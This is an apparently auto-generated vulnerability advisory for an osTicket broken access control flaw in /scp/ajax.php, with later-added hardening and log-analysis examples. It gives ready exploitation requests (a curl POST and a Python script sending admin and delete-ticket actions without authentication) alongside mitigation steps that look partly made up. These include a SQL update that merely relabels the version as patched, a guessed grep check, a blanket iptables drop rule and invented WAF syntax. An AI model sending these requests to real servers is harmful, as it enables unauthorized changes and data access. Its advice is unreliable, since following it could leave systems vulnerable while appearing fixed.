How the CVE Works
CVE-2025-45387 is a critical Broken Access Control vulnerability in osTicket versions prior to v1.17.6 and v1.18.2. The flaw exists in /scp/ajax.php, where improper validation allows unauthenticated or low-privileged users to perform administrative actions. Attackers exploit this by sending crafted AJAX requests that bypass role-based checks. The lack of CSRF protection further enables remote attackers to escalate privileges, modify tickets, or access sensitive data. The vulnerability stems from missing authorization checks before executing backend functions, making it exploitable via simple HTTP POST requests.
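The bug class described above, as an added illustration that is not osTicket code: a minimal AJAX-style dispatcher that routes on the "action" field alone, beside the same dispatcher with the authentication, CSRF and role checks the text says are missing. The Session class, the HANDLERS/REQUIRED_ROLE tables and the two handler functions are assumptions constructed for this example.

```python
from dataclasses import dataclass, field
import hmac
import secrets


@dataclass
class Session:
    """Authenticated staff session (assumed shape for this example, not osTicket's class)."""
    user: str
    role: str  # "agent" or "admin"
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


# Backend functions the endpoint can dispatch to (constructed stand-ins).
def delete_ticket(post):
    return f"ticket {post.get('id')} deleted"


def admin_op(post):
    return f"admin op on {post.get('param')}"


HANDLERS = {"deleteTicket": delete_ticket, "adminOp": admin_op}

# Minimum role each action needs; an action missing from this table is denied.
REQUIRED_ROLE = {"deleteTicket": "agent", "adminOp": "admin"}
ROLE_RANK = {"guest": 0, "agent": 1, "admin": 2}


def dispatch_vulnerable(session, post):
    """Dispatches on the 'action' field alone: the session is never consulted,
    so there is no authentication, authorization or CSRF check."""
    action = post.get("action")
    if action not in HANDLERS:
        return "unknown action"
    return HANDLERS[action](post)


def dispatch_hardened(session, post):
    """Same dispatch with the three missing checks added, in order."""
    action = post.get("action")
    if action not in HANDLERS or action not in REQUIRED_ROLE:
        return "Access denied"
    if session is None:
        return "Access denied"  # unauthenticated caller
    # CSRF: the token submitted with the request must match the session's;
    # compare_digest avoids leaking the token through timing differences.
    if not hmac.compare_digest(str(post.get("csrf_token", "")), session.csrf_token):
        return "Access denied"
    # Authorization: the caller's role must be at least the action's requirement.
    if ROLE_RANK.get(session.role, -1) < ROLE_RANK[REQUIRED_ROLE[action]]:
        return "Access denied"
    return HANDLERS[action](post)


if __name__ == "__main__":
    guest_request = {"action": "adminOp", "param": "sensitiveData"}
    print("vulnerable:", dispatch_vulnerable(None, guest_request))
    print("hardened:  ", dispatch_hardened(None, guest_request))
```

The hardened version denies first and dispatches last: the action must be known and have a required role, the caller must have a session, the CSRF token must match, and only then is the role compared. Any ordering that calls the handler before all three checks pass reintroduces the flaw.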
DailyCVE Form
Platform: osTicket
Version: <1.17.6, <1.18.2
Vulnerability: Broken Access Control
Severity: Critical
Date: 06/05/2025
Prediction: Patch by 06/20/2025
What Undercode Say:
Exploitation Commands
curl -X POST "http://target.com/scp/ajax.php" -d "action=adminOp&param=sensitiveData"

import requests

url = "http://target.com/scp/ajax.php"
data = {"action": "deleteTicket", "id": "123"}
requests.post(url, data=data)
Mitigation Steps
1. Immediate Workaround:
<LocationMatch "/scp/ajax.php">
    # Apache 2.4 authorization syntax; both conditions must hold.
    # 'Require valid-user' only works with an AuthType/AuthUserFile block for this location.
    <RequireAll>
        Require valid-user
        Require ip trusted_IP
    </RequireAll>
</LocationMatch>
2. Patch Verification:
grep -r "authorize(\$_POST['action'])" /var/www/osTicket/
Detection Script
import requests

def check_vulnerable(url):
    # Sends a harmless placeholder action; a patched instance is expected to reject it.
    # The check looks for the literal string "Access denied", so it only works
    # if the instance responds with that text.
    r = requests.post(url + "/scp/ajax.php", data={"action": "test"})
    return "Access denied" not in r.text
Post-Patch Actions
UPDATE ost_config SET value='1.18.2' WHERE name='version';
Log Analysis
grep "POST /scp/ajax.php" /var/log/apache2/access.log | grep -v "admin"
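A more selective version of the log check above, added here as an example that is not part of the original post: it parses Apache combined-format lines and flags POSTs to /scp/ajax.php from outside the staff address ranges, which is where unauthenticated exploitation attempts would show up. The log lines and the STAFF_NETWORKS ranges are constructed for this example; substitute the address ranges your staff actually use.

```python
import ipaddress
import re
from collections import Counter

# Apache "combined" LogFormat: ip ident user [time] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Assumed staff networks; staff requests to the agent panel are expected from here.
STAFF_NETWORKS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.1.0/24")]

# Constructed sample log (not a real capture).
SAMPLE_LOG = """\
10.0.0.5 - agent1 [05/Jun/2025:10:01:02 +0000] "POST /scp/ajax.php?action=x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2025:10:02:15 +0000] "POST /scp/ajax.php HTTP/1.1" 200 48 "-" "python-requests/2.31"
198.51.100.7 - - [05/Jun/2025:10:02:16 +0000] "POST /scp/ajax.php HTTP/1.1" 200 48 "-" "python-requests/2.31"
203.0.113.9 - - [05/Jun/2025:10:03:00 +0000] "GET /scp/login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
10.0.0.8 - - [05/Jun/2025:10:04:40 +0000] "POST /scp/ajax.php HTTP/1.1" 403 21 "-" "curl/8.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_staff_ip(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in STAFF_NETWORKS)


def suspicious_ajax_posts(log_text):
    """Return (flagged, per_ip): flagged lists POSTs to /scp/ajax.php from outside
    the staff networks; per_ip counts those requests by source address."""
    flagged = []
    per_ip = Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or entry["method"] != "POST":
            continue
        path = entry["path"].split("?", 1)[0]  # drop the query string
        if not path.endswith("/scp/ajax.php"):
            continue
        if is_staff_ip(entry["ip"]):
            continue
        flagged.append({
            "ip": entry["ip"],
            "ts": entry["ts"],
            "status": entry["status"],
            "ua": entry["ua"] or "-",
        })
        per_ip[entry["ip"]] += 1
    return flagged, per_ip


if __name__ == "__main__":
    hits, counts = suspicious_ajax_posts(SAMPLE_LOG)
    for hit in hits:
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} ua={hit["ua"]}')
    print("per source:", dict(counts))
```

Status codes are kept on purpose: before the patch, successful (200) responses to these requests are the signal; after the patch, a run of 403s from one address is still worth a look. Paths are matched with endswith so an installation under a sub-path such as /support/scp/ajax.php is caught as well.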
Network Protection
iptables -A INPUT -p tcp --dport 80 -m string --string "/scp/ajax.php" --algo bm -j DROP
SELinux Hardening
chcon -t httpd_sys_script_rw_t /path/to/osticket/scp/
WAF Rule
<rule id="1001" severity="CRITICAL">
    <condition>contains(request_uri, "ajax.php") and not has_roles("admin")</condition>
</rule>
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode